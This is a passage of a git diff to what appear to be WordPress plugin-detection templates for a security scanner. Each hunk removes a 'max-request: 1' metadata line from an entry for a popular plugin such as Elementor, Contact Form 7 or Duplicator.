     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 6b0ed799ef..ba558305a4 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
